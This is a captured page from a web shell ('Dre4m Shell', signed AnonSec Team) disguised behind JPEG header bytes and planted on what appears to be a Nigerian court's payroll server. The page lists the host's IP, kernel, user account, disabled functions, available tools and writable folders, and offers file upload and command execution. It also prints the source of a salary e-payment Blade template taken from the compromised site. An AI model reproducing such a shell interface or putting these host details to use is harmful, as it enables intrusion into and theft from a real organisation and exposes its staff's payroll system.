ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.135.221.160
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/a290d7f8a71193ab3c66122d5e9ad9849aeeb5c6.php
<?php $__env->startSection('pageTitle'); ?>
E-payment
<?php $__env->stopSection(); ?>
<?php $__env->startSection('content'); ?>
<form method="POST" action="<?php echo e(url('/schedule/bank-by-bank/retrieve')); ?>" target="_blank">
  <div class="box-body" style ="background:#fff;">
    <div class="row">
      <div class="col-md-12"><!--1st col-->
        <?php if(count($errors) > 0): ?>
        <div class="alert alert-danger alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
          </button>
          <strong>Error!</strong> 
          <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
          <p><?php echo e($error); ?></p>
          <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
        </div>
        <?php endif; ?>
        <?php if(session('message')): ?>
        <div class="alert alert-success alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
          <strong>Success!</strong> 
          <?php echo e(session('message')); ?>

        </div>                        
        <?php endif; ?>
      </div>
      <?php echo e(csrf_field()); ?>

      <div class="col-md-12">
       <h4 class="" style="text-transform:uppercase">Salary Bank Schedule Epayment Report</h4>
        <div class="row">
      

              <?php if($CourtInfo->courtstatus==1): ?>
      <div class="col-md-6">
            <div class="form-group">
              <label>Select Court</label>
              <select name="court" id="court" class="form-control" style="font-size: 13px;">
                <option value="">Select Court</option>
                <?php $__currentLoopData = $courts; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $court): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                <?php if($court->id == session('anycourt')): ?>
                <option value="<?php echo e($court->id); ?>" selected="selected"><?php echo e($court->court_name); ?></option>
              <?php else: ?>
              <option value="<?php echo e($court->id); ?>" <?php if(old('court') == $court->id): ?> selected <?php endif; ?>><?php echo e($court->court_name); ?></option>
              <?php endif; ?>
                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
              </select>
               
            </div>
          </div>

        <?php else: ?>
          <input type="hidden" id="court" name="court" value="<?php echo e($CourtInfo->courtid); ?>">
        <?php endif; ?>

          <?php if($CourtInfo->divisionstatus==1 && Auth::user()->is_global==1): ?>
        <div class="col-md-6">
            <div class="form-group">
              <label>Select Division</label>  
              <select name="division" id="division" class="form-control" style="font-size: 13px;">
              <option value="">Select Division</option>
               <?php $__currentLoopData = $courtDivisions; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $divisions): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
               <option value="<?php echo e($divisions->divisionID); ?>" <?php if(old('division') == $divisions->divisionID): ?> selected <?php endif; ?>><?php echo e($divisions->division); ?></option>
               <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
              </select>
             </div>
            </div>
          <?php else: ?>
          <div class="col-md-6">
              <div class="form-group">
                  <label>Division</label>
                      <input type="text" class="form-control" id="divisionName" name="divisionName" value="<?php echo e($curDivision->division); ?>" readonly>
              </div>
          </div>
            <input type="hidden" id="division" name="division" value="<?php echo e(Auth::user()->divisionID); ?>">
            <!--<input type="hidden" id="division" name="division" value="<?php echo e($CourtInfo->divisionid); ?>">-->
          <?php endif; ?>

<div class="col-md-6">
          <div class="form-group">
            <label >Select a Year</label>
            <select name="year" id="section" class="form-control">
              <option value="">Select Year</option>
              <?php for($i=2011;$i<=2040;$i++): ?>
               <option value="<?php echo e($i); ?>" <?php if(old('year') == $i): ?> selected <?php endif; ?>><?php echo e($i); ?></option>
              <?php endfor; ?>
            </select>
          </div>
        </div>
          <div class="col-md-6">
          <div class="form-group">
            <label> Select a Month </label>
            <select name="month" id="section" class="form-control">
              <option value="">Select Month </option>
              <option value="JANUARY" <?php if(old('month') == 'JANUARY'): ?> selected <?php endif; ?>>January</option>
              <option value="FEBRUARY" <?php if(old('month') == 'FEBRUARY'): ?> selected <?php endif; ?>>February</option>
              <option value="MARCH" <?php if(old('month') == 'MARCH'): ?> selected <?php endif; ?>>March</option>
              <option value="APRIL" <?php if(old('month') == 'APRIL'): ?> selected <?php endif; ?>>April</option>
              <option value="MAY" <?php if(old('month') == 'MAY'): ?> selected <?php endif; ?>>May</option>
              <option value="JUNE" <?php if(old('month') == 'JUNE'): ?> selected <?php endif; ?>>June</option>
              <option value="JULY" <?php if(old('month') == 'JULY'): ?> selected <?php endif; ?>>July</option>
              <option value="AUGUST" <?php if(old('month') == 'AUGUST'): ?> selected <?php endif; ?>>August</option>
              <option value="SEPTEMBER" <?php if(old('month') == 'SEPTEMBER'): ?> selected <?php endif; ?>>September</option>
              <option value="OCTOBER" <?php if(old('month') == 'OCTOBER'): ?> selected <?php endif; ?>>October</option>
              <option value="NOVEMBER" <?php if(old('month') == 'NOVEMBER'): ?> selected <?php endif; ?>>November</option>
              <option value="DECEMBER" <?php if(old('month') == 'DECEMBER'): ?> selected <?php endif; ?>>December</option>
            </select>
          </div>
        </div>
       
        <div class="col-md-6">
          <div class="form-group">
            <label for="bankName">BANK NAME</label>
            <select name="bankName" id="bankName_"  class="form-control">
            <option value="">Select Bank</option>
                <?php $__currentLoopData = $allbanklist; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
               <option value="<?php echo e($list->bankID); ?>" <?php if(old('bankName') == $list->bankID): ?> selected <?php endif; ?>><?php echo e($list->bank); ?> </option>
               <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
            </select>
          </div>
        </div>
        
        <div class="col-md-6">
          <div class="form-group">
            <label>Bank Group</label>
            <input type="text" name="bankGroup" id="bankGroup" class="form-control" value="<?php echo e(old('startDate')); ?>" />
          </div>
        </div>
        <div class="col-md-12">
          <div class="form-group">
            <div >
              <button type="submit" class="btn btn-success btn-sm pull-right">Generate Schedule</button>
            </div>
          </div>           
        </div>
      </div>
    </div>
  </div>
</div><!-- /.col -->
</div><!-- /.row -->
</form>
<?php $__env->stopSection(); ?>
<?php $__env->startSection('styles'); ?>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>

<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

<script type="text/javascript">

$(document).ready(function(){

$("#court").on('change',function(e){
 e.preventDefault();
var id = $(this).val();
//alert(id);
$token = $("input[name='_token']").val();
$.ajax({
headers: {'X-CSRF-TOKEN': $token},
url: murl +'/session/court',

type: "post",
data: {'courtID':id},
success: function(data){
location.reload(true);
//console.log(data);
}
});

});
});
</script>
<?php $__env->stopSection(); ?>




<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH C:\xampp\htdocs\nicngrp\resources\views/bankSalarySchedule/index.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team